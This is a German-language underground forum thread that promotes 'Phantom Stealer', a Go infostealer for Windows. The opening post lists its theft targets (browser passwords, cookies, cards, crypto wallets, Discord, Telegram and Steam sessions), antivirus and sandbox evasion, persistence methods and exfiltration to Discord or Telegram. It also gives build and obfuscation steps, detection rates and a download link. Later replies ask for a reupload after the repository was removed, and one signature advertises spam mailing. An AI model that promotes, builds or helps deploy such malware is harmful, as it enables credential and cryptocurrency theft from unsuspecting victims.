BullDDoser Posted March 27 Posted March 27 Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord) PHANTOM STEALER Open Source Golang Infostealer - Full Source Code What is this? Full source code for a Windows infostealer written in Go. Grabs browser passwords, cookies, crypto wallets, Discord tokens, and more. Sends everything to Discord webhook or Telegram bot. Built this as a learning project, figured I'd release it for anyone who wants to learn or use it for research. Features: Browser Stealer - Chrome, Edge, Brave, Opera, Firefox + more - Passwords (DPAPI + AES-GCM decryption) - Cookies - Credit cards - Autofill - History Crypto Wallet Stealer - 40+ wallets - Desktop: Exodus, Electrum, Atomic, Bitcoin Core, etc - Extensions: MetaMask, Phantom, Trust, Coinbase, Ronin, etc Token Grabber - Discord tokens (including encrypted) - Telegram sessions (tdata) - Steam (SSFN + config) System Info - Screenshot - Clipboard - WiFi passwords - Hardware specs - Installed software - Running processes Evasion - VM detection - Debugger detection - AMSI/ETW patching - Defender exclusion Persistence (optional) - Registry - Startup folder - Scheduled task - WMI subscription Exfil - Discord webhook - Telegram bot - Zipped and organized Setup: 1. Edit config/config.go with your webhook/bot token 2. Build: go build -ldflags "-s -w -H windowsgui" -o stub.exe . 3. Optional: Use garble for obfuscation 4. Run and check your webhook Download: github.com/1rhino2/phantom-stealer Scans: Clean build: ~5-10/70 on VT (expected for any stealer) With garble: lower detection Credits: Solo project, built from scratch. No copy paste. Note: For educational purposes. Don't be stupid with it. Virusscan und VM ist euere Freung! 5 Quote Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs! SESSION: 051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552 Threema HUZWDPY3
Machiavellixd Posted March 27 Posted March 27 6 hours ago, BullDDoser said: Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord) PHANTOM STEALER Open Source Golang Infostealer - Full Source Code What is this? Full source code for a Windows infostealer written in Go. Grabs browser passwords, cookies, crypto wallets, Discord tokens, and more. Sends everything to Discord webhook or Telegram bot. Built this as a learning project, figured I'd release it for anyone who wants to learn or use it for research. Features: Browser Stealer - Chrome, Edge, Brave, Opera, Firefox + more - Passwords (DPAPI + AES-GCM decryption) - Cookies - Credit cards - Autofill - History Crypto Wallet Stealer - 40+ wallets - Desktop: Exodus, Electrum, Atomic, Bitcoin Core, etc - Extensions: MetaMask, Phantom, Trust, Coinbase, Ronin, etc Token Grabber - Discord tokens (including encrypted) - Telegram sessions (tdata) - Steam (SSFN + config) System Info - Screenshot - Clipboard - WiFi passwords - Hardware specs - Installed software - Running processes Evasion - VM detection - Debugger detection - AMSI/ETW patching - Defender exclusion Persistence (optional) - Registry - Startup folder - Scheduled task - WMI subscription Exfil - Discord webhook - Telegram bot - Zipped and organized Setup: 1. Edit config/config.go with your webhook/bot token 2. Build: go build -ldflags "-s -w -H windowsgui" -o stub.exe . 3. Optional: Use garble for obfuscation 4. Run and check your webhook Download: github.com/1rhino2/phantom-stealer Scans: Clean build: ~5-10/70 on VT (expected for any stealer) With garble: lower detection Credits: Solo project, built from scratch. No copy paste. Note: For educational purposes. Don't be stupid with it. Virusscan und VM ist euere Freung! nice wollte mich schon lange wieder mit malware und rats beschaeftigen auch nur aus interesse danke 2 Quote Neuer Tg @Machiavellixd auf Telegram ! B2B B2C Kataloge Webseiten Unternehmen uvm // Partnerschaften oder Erwerb Qualitativer Mail Spam und API Transactional Mailsender.
BullDDoser Posted May 26 Author Posted May 26 Push 0 Quote Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs! SESSION: 051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552 Threema HUZWDPY3
MajinBuu Posted July 14 Posted July 14 On 27.3.2026 at 14:30, BullDDoser said: Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord) PHANTOM STEALER Open Source Golang Infostealer - Full Source Code What is this? Full source code for a Windows infostealer written in Go. Grabs browser passwords, cookies, crypto wallets, Discord tokens, and more. Sends everything to Discord webhook or Telegram bot. Built this as a learning project, figured I'd release it for anyone who wants to learn or use it for research. Features: Browser Stealer - Chrome, Edge, Brave, Opera, Firefox + more - Passwords (DPAPI + AES-GCM decryption) - Cookies - Credit cards - Autofill - History Crypto Wallet Stealer - 40+ wallets - Desktop: Exodus, Electrum, Atomic, Bitcoin Core, etc - Extensions: MetaMask, Phantom, Trust, Coinbase, Ronin, etc Token Grabber - Discord tokens (including encrypted) - Telegram sessions (tdata) - Steam (SSFN + config) System Info - Screenshot - Clipboard - WiFi passwords - Hardware specs - Installed software - Running processes Evasion - VM detection - Debugger detection - AMSI/ETW patching - Defender exclusion Persistence (optional) - Registry - Startup folder - Scheduled task - WMI subscription Exfil - Discord webhook - Telegram bot - Zipped and organized Setup: 1. Edit config/config.go with your webhook/bot token 2. Build: go build -ldflags "-s -w -H windowsgui" -o stub.exe . 3. Optional: Use garble for obfuscation 4. Run and check your webhook Download: github.com/1rhino2/phantom-stealer Scans: Clean build: ~5-10/70 on VT (expected for any stealer) With garble: lower detection Credits: Solo project, built from scratch. No copy paste. Note: For educational purposes. Don't be stupid with it. Virusscan und VM ist euere Freung! leider nicht mehr online 0 Quote
BullDDoser Posted July 14 Author Posted July 14 2 hours ago, MajinBuu said: leider nicht mehr online Wird seinen Grund gehabt haben warun Github die Software gelöscht hat. Den Grund kann ich dir nicht nennen. Sorry Amigo 1 Quote Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs! SESSION: 051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552 Threema HUZWDPY3
EL DRuff Posted Friday at 08:33 PM Posted Friday at 08:33 PM On 14.7.2026 at 15:51, BullDDoser said: Wird seinen Grund gehabt haben warun Github die Software gelöscht hat. Den Grund kann ich dir nicht nennen. Sorry Amigo könntest die github datei auf pastebin hochladen? wäre echt top ! schade dass so schnell gelöscht wurde,,... Auf archive.org lohnt sich nachzusehn? 0 Quote
BullDDoser Posted Friday at 08:35 PM Author Posted Friday at 08:35 PM 6 minutes ago, EL DRuff said: könntest die github datei auf pastebin hochladen? wäre echt top ! schade dass so schnell gelöscht wurde,,... Auf archive.org lohnt sich nachzusehn? Hab sie leider nicht gespeichert Sorry @ EL DRuff LG Bulli 1 Quote Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs! SESSION: 051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552 Threema HUZWDPY3
Recommended Posts